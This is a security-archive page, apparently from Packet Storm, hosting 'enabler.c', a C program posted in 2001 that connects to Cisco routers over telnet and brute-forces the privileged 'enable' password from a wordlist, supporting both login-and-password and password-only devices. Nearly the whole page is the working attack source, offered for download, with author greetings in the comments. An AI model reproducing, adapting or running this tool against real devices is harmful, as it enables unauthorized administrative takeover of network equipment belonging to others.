exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

enabler.c

enabler.c
Posted Jan 13, 2001
Authored by Norby | Site avatarcorp.org

Enabler.c attempts to find the enable password on a cisco system via brute force. Tested on Cisco 2600's and 12008's and has support for login-pass as well as login-only devices.

systems | cisco
SHA-256 | 6c9df24566f021f2620f2e21a1865e88c3f4961ebb5920182e11f1f413bbba6a

enabler.c

Change Mirror Download
/*

.: free source :. .: coded 4 Avatar Corp :.

enabler.
cisco internal bruteforcer.

coder - norby
concept - anyone


this program just logs into a CISCO router and tries a list of
passes looking for the enable one.
it works in password-only CISCO as well in login-pass ones and
has been succesfully tested on many 2600 and a few 12008.
the prog's concept [bruteforcing a router for gaining enable access]
is quite simple ...how amazing I haven't seen similar progs before!

anti eleet&0day force ;)
anyway... information wants to be free :)

sciao belli

saluti a berserker mandarine, acidcrash
beho x la traduzione :)

norby
saluti a *lei*, saluti a gabriella che a capodanno
non ha voluto lasciare il ragazzo x fare un bambino con me ;)
saluti a tutti gli avatar, a sandman, a tutte le diecimila
persone che conosco
any
saluti a Acida, storm\, Raid

contact` norby - staff22@infinito.it anyone - anyone@anyone.org
www.avatarcorp.org


neural collapse _ i truly hope in this project

v1 02/10/2k+1
todo for v2: use of threads, implement a passlist recovery
(very simple feature)
*/



#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>

#define BOX "\033[0m\033[34;1m[\033[0m\033[37;1m`\033[0m\033[34;1m]"

struct sockaddr_in addr;
char host[100];
struct hostent *hp;
int sock_stat;

int n,x;
char **password;

char resolve(char *inputhost) {

int a,b,c,d;

if (sscanf(inputhost,"%d.%d.%d.%d",&a,&b,&c,&d) !=4) {
hp = gethostbyname(inputhost);
if (hp == NULL) { printf("%s error on host resolving\n\033[0m\n", BOX); exit(0); }
sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0],
(unsigned char)hp->h_addr_list[0][1],
(unsigned char)hp->h_addr_list[0][2],
(unsigned char)hp->h_addr_list[0][3]);
}
else { strncpy(host,inputhost,100); }
}

int sock(char *hostoresolve,int port) {

int err;

sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sock_stat<0) { printf("%s error opening socket\n\033[0m\n", BOX); exit(0); }

addr.sin_family = PF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(host);

err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));
if (err < 0) { printf("%s error opening connection\n\033[0m\n", BOX); exit(0); }
}

int banner() {
printf("\n%s enabler.\n", BOX);
printf("%s cisco internal bruteforcer. concept by anyone\n", BOX);
printf("%s coded by norby\n", BOX);
}
int usage(char *argv) { printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]\n\n\033[0m", BOX, argv); }

void sig() {
if(n>0) { printf("%s %i passwords tryed. no password matching. leaving\n",BOX,n); }
printf("\n\033[0m"); exit(0);
}

int login(char *login, char *pass) {

char *input = malloc(4000);
int reqlogin;

while (read (sock_stat, input, 4000) > 0) {
if(strstr(input,"ogin:")||strstr(input,"sername:")) {
if(!strcmp(login,"n0login")) {
printf("%s username needed... give me a username next time :)\n\n\033[0m", BOX);
exit(0);
}
printf("%s login requested. sending [%s] and [%s]\n", BOX, login, pass); reqlogin=1; break;
}
if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]\n", BOX, pass); reqlogin=0; break; }
bzero(input,4000);
}

if(reqlogin==1) {
write(sock_stat,login,strlen(login));
write(sock_stat,"\r\n",2);

while(read(sock_stat,input,4000)>0) {
if(strstr(input,"assword")); { break; }
}
}

write(sock_stat,pass,strlen(pass));
write(sock_stat,"\r\n",2);

sleep(2);

bzero(input,4000);

while (read (sock_stat, input, 4000) > 0) {
if(strstr(input,">")) { printf("%s seems we are logged in :)\n", BOX); break; }
/* if(strstr(input,"assword:")) {
printf("%s sorry... [%s] is not a good password for login :°\n\033[0m\n",BOX,pass); exit(0);
}*/
if(strstr(input,"sername:")) {
printf("%s sorry... [%s] is not a good password for login :°\n\033[0m\n",BOX,pass); exit(0);
}
bzero(input,4000);
}
}

int loadwordlist(char *list) {

FILE *passlist;
char buf[32], fake;
int i,z;

if ((passlist = fopen(list, "r")) == NULL) {
printf("%s sorry, unable to open the passlist [%s]\n\033[0m\n", BOX,list);
exit(0);
}

(void)fseek(passlist, 0L, SEEK_END); // cazz questo e' uno smanettamento mentale
password = malloc(ftell(passlist)); // per fare allocare solo la memoria giusta x la passlist :P
if(password == NULL) {
printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlist\n\033[0m\n",BOX);
exit(0);
}

(void)fseek(passlist, 0L, SEEK_SET);

while (!feof(passlist)) {
fgets(buf, 32, passlist);
if (buf[0] == '#' || buf[0] == '\n') continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n') buf[i] = '\0';
password[x] = malloc(32);
strcpy(password[x], buf);
memset(buf, 0, 32);
x++;
}
password[x] = 0x0;
fclose(passlist);
if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving \n\033[0m\n",BOX); exit(0); }

}

int brute() { // there is a stupid error... the last password is tryed 2 times... must be fixed... ;)

char *input = malloc(100);
int N;

bzero(input,100);

write(sock_stat,"enable",6);
write(sock_stat,"\r\n",2);


while(1) {

while(read(sock_stat,input,100)>0) {
if(n==x) { printf("%s %i passwords tried. no valid password found in the passlist\n\033[0m\n",BOX,n-1); exit(0); }
if(n+1==x) break;
if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break;
bzero(input,100);
}

if(strstr(input,"#")) { printf("%s possible password found: %s\n\033[0m\n",BOX,password[n-1]); exit(0); }

if(strstr(input,"assword:")) {
write(sock_stat,password[n],strlen(password[n]));
write(sock_stat,"\r\n",2);
n++;
bzero(input,100);
if(n>1) printf("%s %s... wrong password\n", BOX, password[n-2]); fflush(stdout);
continue;
}
if(strstr(input,">")) {
write(sock_stat,"enable\r\n",8); bzero(input,100);
}
}
}

int main(int argc, char *argv[]) {

int port;

signal(SIGINT, sig);

banner();
if((argc<=3)||(argc>=8)) { usage(argv[0]); exit(0); }

if(!strcmp(argv[2],"-u")) {
if(argc==6) { port=atoi("23"); }
else { port=atoi(argv[6]); } // c'e' uno stupido errore qua di argc che nn ho voglia di trovare
// c'ho cosetta nella testa :° -- Corretto :)

printf("%s\n",BOX);

loadwordlist(argv[5]);
resolve(argv[1]);
sock(host, port);
login(argv[3],argv[4]);
brute();
}

else {
if(argc==4) { port=atoi("23"); }
else { port=atoi(argv[4]); }
printf("%s\n",BOX);

loadwordlist(argv[3]);
resolve(argv[1]);
sock(host, port);
login("n0login",argv[2]);
brute();
}
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close